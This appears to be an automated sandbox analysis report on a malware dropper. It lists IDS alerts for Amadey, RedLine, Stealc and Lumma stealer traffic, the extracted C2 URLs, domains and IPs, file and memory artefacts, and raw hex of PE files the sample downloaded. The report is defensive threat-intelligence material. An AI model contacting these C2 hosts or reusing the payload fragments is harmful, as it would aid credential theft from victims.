Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tLYMe5--newnew

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe

Unpacked PE file: 23.2.BitcoinCore.exe.3810000.2.unpack

Source: OmnqazpM3P.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.57.172.44:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49769 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000014.00000002.3059192881.000000006C23D000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: c:\rje\tg\3fl4\obj\Re\ease\etf.pdb source: axplong.exe, 00000006.00000002.3380519963.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe.6.dr
Source:	Binary string: BitLockerToGo.pdb source: caesium-image-compressor.exe, 00000015.00000002.2975464614.0000000001A80000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3228961940.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: BitcoinCore.exe, 00000017.00000002.3258029489.0000000004692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: BitcoinCore.exe, 00000017.00000002.3258029489.0000000004692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000014.00000002.3059192881.000000006C23D000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: caesium-image-compressor.exe, 00000015.00000002.2975464614.0000000001A80000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3228961940.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041B6DA FindFirstFileExW,

12_2_0041B6DA

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_066A8E01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 066AD043h	9_2_066ACE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	9_2_066A2E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 066AE865h	9_2_066AE844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	9_2_066A3158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 066ABA03h	9_2_066AB9EB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49712 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49712
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49715 -> 95.179.250.45:26212
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49715 -> 95.179.250.45:26212
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.250.45:26212 -> 192.168.2.5:49715
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49714 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49716 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.250.45:26212 -> 192.168.2.5:49715
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49722 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49725 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49724 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49724 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.17:80 -> 192.168.2.5:49724
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49724 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.17:80 -> 192.168.2.5:49724
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49724 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49721 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49721 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49729 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49730 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.5:55125 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.5:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.5:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.5:49734 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.5:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.5:49738 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.5:57972 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49741 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49743 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49745 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.5:49744
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49750 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49753 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2055477 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) : 192.168.2.5:61294 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.5:49755 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.5:49760 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49758 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49766 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.5:49769 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49772 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49777 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49775 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49779 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49755 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49755 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49769 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49769 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49760 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49760 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	IPs: 185.215.113.19
Source: Malware configuration extractor	URLs: 95.179.250.45:26212

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: openvpn12.exe.6.dr

Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 95.179.250.45:26212
Source: global traffic	TCP traffic: 192.168.2.5:49721 -> 65.21.18.51:45580

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:06 GMTContent-Type: application/octet-streamContent-Length: 1104936Last-Modified: Mon, 19 Aug 2024 12:56:48 GMTConnection: keep-aliveETag: "66c34110-10dc28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 08 c3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 10 00 00 08 00 00 00 00 00 00 1e ca 10 00 00 20 00 00 00 e0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c9 10 00 4f 00 00 00 00 e0 10 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 b6 10 00 28 26 00 00 00 00 11 00 0c 00 00 00 94 c8 10 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 aa 10 00 00 20 00 00 00 ac 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 05 00 00 00 e0 10 00 00 06 00 00 00 ae 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 11 00 00 02 00 00 00 b4 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca 10 00 00 00 00 00 48 00 00 00 02 00 05 00 90 b9 10 00 04 0f 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 0d ac 93 4c e6 76 fa 6c 54 10 70 23 8b 45 05 b2 27 26 c8 c4 40 63 43 04 ce d8 74 45 d1 ab 91 c8 04 c9 25 20 0b eb 83 e8 84 70 72 2a 51 41 b8 55 ea 76 36 0f d5 56 c6 3d 18 43 78 96 1c 47 15 48 f2 45 8b cf 1b b3 de 69 85 85 82 04 c7 a1 28 68 68 c6 71 c4 82 42 66 0c c0 7d c6 b9 05 a5 67 4c 2d 17 53 a8 31 29 2c 70 98 e0 aa c4 d7 e7 ae b6 24 94 38 f0 69 6a 33 0e 1b b9 fb e0 37 d3 b3 fc ab 07 21 54 73 8c c9 9f df cf ec 18 54 a7 5b 89 c7 0a 58 aa b0 50 55 45 a5 63 d0 b8 6a 0a 1e c5 b5 73 ca be 5d 1c 45 fc f5 9b 1d f7 00 94 00 71 fb 58 80 77 73 53 c7 59 bb 8e ad ae 67 29 fa d9 e7 1a f3 9c f5 37 49 aa fe ee 4f 4b af 09 6d 28 13 86 64 1f 28 bd 54 ca de cb b3 81 b4 13 07 1b 30 60 c0 56 60 01 b3 00 6f bb b4 9a dd ac 45 17 47 9e ca 0e 23 05 49 09 f0 71 13 a0 14 ed c2 6c 68 39 9c f1 2b d5 fb 00 e4 ba 12 8b 08 9a 3e 36 51 8b e1 3d d8 53 20 d3 f4 14 b3 c3 ed 05 ad c0 b5 b1 2d 89 f5 dc ff 23 d5 d2 5d 90 01 c3 02 14 88 0e 72 41 cb 52 1e 9e 8b 0d 90
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:10 GMTContent-Type: application/x-msdos-programContent-Length: 425984Connection: keep-aliveLast-Modified: Sat, 24 Aug 2024 17:17:20 GMTETag: "68000-620711078a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 3c 4c 00 00 e0 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 91 05 00 18 00 00 00 18 91 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 c8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0a e5 04 00 00 10 00 00 00 e6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 38 10 01 00 00 00 05 00 00 12 01 00 00 ea 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 20 06 00 00 34 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 4c 00 00 00 a0 06 00 00 4e 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:13 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
